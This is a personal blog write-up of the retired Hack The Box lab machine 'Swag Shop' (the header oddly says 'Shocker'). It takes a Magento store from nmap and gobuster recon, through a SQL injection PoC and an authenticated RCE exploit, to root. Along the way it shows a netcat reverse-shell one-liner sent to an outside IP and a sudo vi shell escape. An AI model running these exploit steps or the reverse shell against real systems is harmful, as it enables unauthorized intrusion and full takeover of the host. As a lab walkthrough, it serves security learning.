Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Shocker

Name: Swag Shop
Release Date: 11 May 2019
Retire Date: 28 Sep 2019
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
evilet 00 days, 00 hours, 50 mins, 50 seconds
Lemming 00 days, 01 hours, 17 mins, 40 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./SwagShop 10.10.10.140

 
$ nmap -sC -sV -Pn -p- -oA ./SwagShop 10.10.10.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 18:47 EDT
Warning: 10.10.10.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.140
Host is up (0.061s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page  
63871/tcp filtered unknown 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                    
Nmap done: 1 IP address (1 host up) scanned in 8862.59 seconds

We've got HTTP and SSH. On HTTP we find a version of a Magneto web store selling HTB swag.  If you look at the footer, you can see that it is a version of the Magneto Demo Store from 2014.  Let's run a quick ExploitDB to see if we've got an easy in here.

The one I'm interested in is the 4th one down RCE on versions < 1.9.0.1 and https://www.exploit-db.com/exploits/37811 has a nice pre-built exploit.  There is a problem though.  This exploit needs admin credentials before we can use it.  So, let's keep looking around.  Running gobuster finds us a lot more of what we need.

 
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.140
===============================================================                                     
Gobuster v3.0.1                                                                                     
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)                                     
===============================================================
[+] Url:            http://10.10.10.140
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/09 19:04:57 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/app (Status: 301)
/errors (Status: 301)
/favicon.ico (Status: 200)
/includes (Status: 301)
/js (Status: 301)
/lib (Status: 301)
/media (Status: 301)
/pkginfo (Status: 301)
/server-status (Status: 403)
/shell (Status: 301)
/skin (Status: 301)
/var (Status: 301)
===============================================================
2020/08/09 19:07:11 Finished
===============================================================

So, I start nav'ing through some of these new found folders and fins /app/etc/local.xml which incidentally gives me the exact install date needed for the original exploit.  It also gives me some database credentials

Digging through some more, we find CVE-2015-1397 which is a vulnerability in Magneto's Shoplift where we can pull a SQLi to get the admin creds we need.  It (PoC code) can be found here.  If we run it, we should have admin creds.

 

 

$ python poc.py http://10.10.10.140
 

WORKED
Check http://10.10.10.140/admin with creds ypwq:123

 

Now we can check them at http://10.10.10.140/index.php/admin to make sure they work.

Now that we know that the admin creds work, we can jump back to the first exploit and add all the variables we need.

 

# Config.
username = 'ypwq'
password = '123'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml

 

I also changed the entire browser form handling:

 

br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
#br.form.fixup()
#br['login[username]'] = username
#br['login[password]'] = password
userone = br.find_control(name='login[username]', nr=0)
userone.value = username
passone = br.find_control(name='login[password]', nr=0)
passone.value = password

 

And enabled the proxy setting so Burp would see what was happening.

I ended up playing with the POST endpoint until I got a response from the 2y instead of 7d endpoint.  I changed that in the script

 

request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)

 

And ran it with:

 

python 37811.py http://10.10.10.140/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9999 >/tmp/f"

 

Yahtzee!  I've got a www-data shell.  The exploit code and the LinEnum.sh output are both in the CTB file.  Which brings us to the privesc of this box.  The LinEnum output shows us that www-data has some NO PASSWORD sudo capabilities.

 

[00;31m[-] Sudoers configuration (condensed):[00mDefaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD:/usr/bin/vi /var/www/html/*

 

Well, in this case Vim is a GTFObin.  We love GTFObins.

 

If we try:

 

sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'

 

We should (and do) get a root shell